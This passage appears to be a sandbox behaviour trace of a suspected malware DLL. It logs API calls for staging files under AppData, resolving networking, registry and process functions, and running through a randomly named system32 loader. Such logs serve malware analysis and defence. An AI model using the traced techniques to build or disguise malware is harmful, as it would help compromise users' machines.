param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.559] GetLastError () returned 0x0 [0034.559] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.559] GetSystemDirectoryA (in: lpBuffer=0x1ef438, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.559] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.559] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.559] CloseHandle (hObject=0x74) returned 1 [0034.559] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.559] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.559] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.560] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.560] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.561] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.561] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.561] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.561] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.561] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.561] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.561] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.562] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.562] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.562] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.563] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.563] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.563] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.563] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.563] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.563] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.563] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.563] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.563] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.564] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.565] HeapDestroy (hHeap=0x13d0000) returned 1 Process: id = "47" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fae0" os_pid = "0xcb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"127.0.0.1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2093 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2094 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2095 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2096 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2097 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2098 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2099 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2100 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2101 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 2102 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2103 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2104 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2105 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2106 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2107 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2108 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2109 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2110 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2111 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2112 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2113 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2114 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2115 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2116 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2117 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2118 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2119 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2120 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2121 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2122 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2123 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2124 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 2125 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 2126 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2127 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2128 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2129 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2130 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2131 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2132 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2133 start_va = 0x1200000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Thread: id = 100 os_tid = 0xcb4 [0034.602] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efba4 | out: lpSystemTimeAsFileTime=0x2efba4*(dwLowDateTime=0xe2503230, dwHighDateTime=0x1d3dfba)) [0034.602] GetCurrentProcessId () returned 0xcb0 [0034.602] GetCurrentThreadId () returned 0xcb4 [0034.602] GetTickCount () returned 0x17c7f [0034.602] QueryPerformanceCounter (in: lpPerformanceCount=0x2efb9c | out: lpPerformanceCount=0x2efb9c*=371423947) returned 1 [0034.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.603] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.603] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.603] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.603] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.603] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.603] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.603] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.603] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.604] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.604] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.604] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.604] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.604] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.604] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.604] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.604] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.604] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.604] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.605] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.605] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.605] GetCurrentThreadId () returned 0xcb4 [0034.605] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"127.0.0.1\"" [0034.605] GetEnvironmentStringsW () returned 0xe79b8* [0034.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x1d09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.605] FreeEnvironmentStringsW (penv=0xe79b8) returned 1 [0034.605] GetStartupInfoA (in: lpStartupInfo=0x2efaf4 | out: lpStartupInfo=0x2efaf4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.605] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.605] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.605] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.605] SetHandleCount (uNumber=0x20) returned 0x20 [0034.605] GetLastError () returned 0x0 [0034.605] SetLastError (dwErrCode=0x0) [0034.605] GetLastError () returned 0x0 [0034.605] SetLastError (dwErrCode=0x0) [0034.606] GetLastError () returned 0x0 [0034.606] SetLastError (dwErrCode=0x0) [0034.606] GetACP () returned 0x4e4 [0034.606] GetLastError () returned 0x0 [0034.606] SetLastError (dwErrCode=0x0) [0034.606] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.606] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2efad4 | out: lpCPInfo=0x2efad4) returned 1 [0034.606] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef5a0 | out: lpCPInfo=0x2ef5a0) returned 1 [0034.606] GetLastError () returned 0x0 [0034.606] SetLastError (dwErrCode=0x0) [0034.606] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2ef530 | out: lpCharType=0x2ef530) returned 1 [0034.606] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.606] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x2ef318, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.606] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x2ef5b4 | out: lpCharType=0x2ef5b4) returned 1 [0034.606] GetLastError () returned 0x0 [0034.606] SetLastError (dwErrCode=0x0) [0034.606] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.606] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.606] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x2ef2e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᮋ矲狰Ā") returned 256 [0034.606] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᮋ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.606] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᮋ矲狰Ā", cchSrc=256, lpDestStr=0x2ef0d8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.606] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" 